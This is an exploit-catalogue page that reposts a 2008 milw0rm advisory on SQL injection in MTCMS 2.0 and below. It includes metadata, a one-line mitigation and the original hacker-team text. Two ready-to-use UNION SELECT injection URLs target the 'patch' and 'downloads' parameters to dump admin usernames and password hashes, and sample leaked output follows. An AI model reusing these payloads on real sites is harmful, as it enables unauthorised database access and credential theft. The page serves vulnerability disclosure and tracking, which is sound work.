MTCMS - exploit.company

vendor:

MTCMS

by:

hadihadi

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: MTCMS

Affected Version From: 2.0 and below

Affected Version To: 2.0 and below

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

MTCMS <=2.0 SQL Injection Vulnerbility

MTCMS version 2.0 and below is vulnerable to SQL injection. An attacker can inject malicious SQL queries via the 'a' and 'cid' parameters in the 'patch' and 'downloads' pages respectively. This can be exploited to gain access to the admin credentials and other sensitive information.

Mitigation:

Input validation should be used to prevent SQL injection attacks. Sanitize all user input and use parameterized queries.

Source

Exploit-DB raw data:

#######################################################################
#                                                                     #
#    ...:::::MTCMS <=2.0  SQL Injection Vulnerbility ::::....         #           
#######################################################################

Virangar Security Team

www.virangar.org
www.virangar.net

--------
Discoverd By :hadihadi

special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra

& all virangar members & all iranian hackerz

greetz:to my best friend in the world hadi_aryaie2004
----------
vules:
http://site.com/patch/?a='/**/union/**/select/**/1,concat(0x23,username,0x5f,password,0x23),email,4,5,6,7/**/from/**/users/**/where/**/id=1/*
http://site.com/patch/?a=downloads&cid='/**/union/**/select/**/1,concat(0x23,username,0x5f,password,0x23),email,4,5,6,7/**/from/**/users/**/where/**/id=1/*

-------------------------------------
you can see some thing similar to:
#admin_35a6e23edefc651ef0380b277ce5d709#
Admin@service.com
-------------------------------------
MTCMS contains of other bugs in other pages ;)
& maybe other versions have Vulnerbility too :)

# milw0rm.com [2008-01-10]